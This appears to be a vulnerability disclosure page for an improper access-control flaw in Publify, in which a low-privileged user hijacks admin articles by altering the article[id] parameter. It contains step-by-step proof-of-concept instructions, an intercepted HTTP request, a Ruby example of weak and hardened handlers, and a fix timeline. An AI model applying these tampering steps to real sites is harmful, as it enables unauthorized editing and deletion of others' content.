Improper Access Control - Articles in publify/publify


Reported on

May 20th 2022


A low-privileged user can modify and delete admin articles just by changing the value of the article[id] parameter.

Proof of Concept

  • Step 1 - Authenticated as an unprivileged user, create a new article

  • Step 2 - Click Edit article

  • Step 3 - Intercept requests and save your article

  • Step 4 - In the intercepted request, change the value of the article[id] parameter to the ID of an admin article (you can get the ID by copying the article's edit link)

  • Step 5 - Submit the request and the admin article will be hijacked.

POST /admin/content/5850 HTTP/1.1
Cookie: _publify_blog_session=cookie
Content-Length: 2234
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBydp1QV5GIbVRQBU
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Disposition: form-data; name="article[id]"

Content-Disposition: form-data; name="article[title]"

Content-Disposition: form-data; name="article[body_and_extended]"

Content-Disposition: form-data; name="article[keywords]"



An unprivileged user is allowed to modify/delete admin's articles.
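The access-control gap described in this report, modelled as an added example in plain Ruby (it is not Publify's code and not the code of the fix commit): one handler picks the record from the client-supplied article[id], the other takes it from the route only, checks ownership and copies only allow-listed fields. The names `update_trusting_body`, `update_scoped`, `sample_store` and the sample articles are hypothetical, and the way the weak handler selects the record is an assumption, since the page does not show the server-side code.

```ruby
# Added illustration in plain Ruby (no Rails); not Publify's code or its fix.
Article = Struct.new(:id, :user_id, :title)
User = Struct.new(:id, :admin)
class Forbidden < StandardError; end

# Only these article fields may be changed by a request; "id" is never one.
PERMITTED = %w[title body_and_extended keywords].freeze

# Constructed data: article 1 belongs to the admin (user 1), 5850 to user 2.
def sample_store
  { 1 => Article.new(1, 1, "Admin post"),
    5850 => Article.new(5850, 2, "My post") }
end

# Weak pattern (assumed): the record is selected by article[id] from the
# request body, and nothing ties it to the logged-in user.
def update_trusting_body(store, _user, url_id, params)
  attrs = params.fetch("article")
  target = store.fetch(Integer(attrs.fetch("id", url_id)))
  target.title = attrs["title"] if attrs.key?("title")
  target
end

# Hardened pattern: the record comes from the route only, ownership is
# checked before any write, and only allow-listed fields are copied.
def update_scoped(store, user, url_id, params)
  target = store.fetch(Integer(url_id))
  unless user.admin || target.user_id == user.id
    raise Forbidden, "user #{user.id} may not edit article #{target.id}"
  end
  attrs = params.fetch("article").slice(*PERMITTED)
  target.title = attrs["title"] if attrs.key?("title")
  target
end

if __FILE__ == $PROGRAM_NAME
  low = User.new(2, false)
  req = { "article" => { "id" => "1", "title" => "changed" } }
  weak, safe = sample_store, sample_store
  update_trusting_body(weak, low, "5850", req)
  update_scoped(safe, low, "5850", req)
  puts "weak handler, admin article title:     #{weak[1].title}"
  puts "hardened handler, admin article title: #{safe[1].title}"
end
```

The same two checks (record scoped to the route, ownership verified before the write) belong on the delete action as well, and make a good regression test for the fixed release.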

We are processing your report and will contact the publify team within 24 hours. (2 years ago)
We have contacted a member of the publify team and are waiting to hear back. (2 years ago)
publify/publify maintainer has acknowledged this report. (2 years ago)
Matijs van Zuijlen validated this vulnerability. (2 years ago)
ninj4c0d3r has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matijs van Zuijlen marked this as fixed in 9.2.9 with commit c0aba8. (2 years ago)
Matijs van Zuijlen has been awarded the fix bounty